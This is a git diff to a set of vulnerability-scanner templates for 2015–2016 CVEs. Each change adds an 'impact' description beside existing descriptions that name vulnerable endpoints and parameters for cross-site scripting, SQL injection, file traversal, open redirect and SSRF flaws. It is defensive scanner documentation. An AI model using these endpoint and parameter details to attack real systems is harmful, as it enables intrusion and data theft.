@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server. remediation: | Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module. reference: diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index eadcb4dc26..44f8f0e842 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 19ac1c3385..ea8c217a9f 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site. remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index d95d57a549..eacb800b92 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 86268aad8b..c86c8c0d21 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 9e3ac2d7fe..f53b832ef6 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 895672cc94..4b09b93911 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + impact: | + An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index c749df2ac1..98af5580fa 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + impact: | + Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. remediation: | Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. reference: diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index fbb582185f..9dc67fbb4d 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to a patched version of Elasticsearch or apply the necessary security patches. reference: diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index e83a389cf0..8d1d9a8211 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 757fd29613..3e65bdf116 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 1fa80cde3b..f6589b14c8 100644 --- a/http/cves/2015/CVE-2015-4050.yaml 
+++ b/http/cves/2015/CVE-2015-4050.yaml @@ -5,6 +5,8 @@ info: author: ELSFA7110,meme-lord severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. reference: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 1c5d7fa538..2493a4fdec 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to plugin version 0.9.9 or latest. reference: diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 95b0e43b1e..1ac80375f6 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml 
@@ -6,6 +6,8 @@ info: severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 365ca1cc3d..94e9b5c4f3 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index c1c52ef74b..14b02a0a89 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index bd4520fd3b..f6ce4a9470 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 734920247d..497d5b5b16 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + impact: | + An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 6a9d415637..e5ae3def7b 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution. remediation: | Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cf5e935f94..b4e022cc6e 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 49934d3c68..a4957d1cfd 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + impact: | + Arbitrary file retrieval remediation: | Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed. reference: diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 342cc2a461..6782a616fe 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Novius OS. reference: diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index ac154585d3..b39a745318 100644 --- a/http/cves/2015/CVE-2015-5461.yaml 
+++ b/http/cves/2015/CVE-2015-5461.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks. remediation: | Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index d1fbad2989..1fb393e157 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation. remediation: | Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 6ca9367a13..2863470087 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. + impact: | + An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code. remediation: Upgrade to Swim Team version 1.45 or newer. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6dafb2f144..fc0908a4d0 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index bd70549171..e1320df876 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + impact: | + The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability. reference: 
diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 3b62efb3e0..39e7c3b527 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 1f58a92ffb..05d483ebb3 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index f3e6c625e2..db50314d39 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 8aa056114e..2f148b0341 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS. remediation: | Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 7da41df920..07b6ea13c5 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index f38ade74c4..3662e329ce 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -5,6 +5,8 @@ info: author: wdahlenb severity: critical description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by IBM to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 0252460cd3..5240d6dcb6 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index af59249a0d..0515be845f 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Kentico CMS. reference: diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index ed428ef892..ad247d190c 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 158d15948f..46df9c860e 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade to a version higher than 5.8.17 to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index cce93f1e64..bae13a33c2 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml 
@@ -5,6 +5,8 @@ info: author: emadshanab severity: high description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index. + impact: | + The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation. remediation: | Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates. reference: diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 2d94216a6d..f50ad6edf5 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 2c504b159c..f95b3c842d 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or potential compromise of the WordPress site. remediation: Fixed in version 2.0.3 reference: - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9 diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 1204101b5c..9eafdb5750 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 648c45c099..aea74c9169 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: 
diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 4db32683c5..90a0205541 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + impact: | + The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 25c2ae22a3..511a7ed38a 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 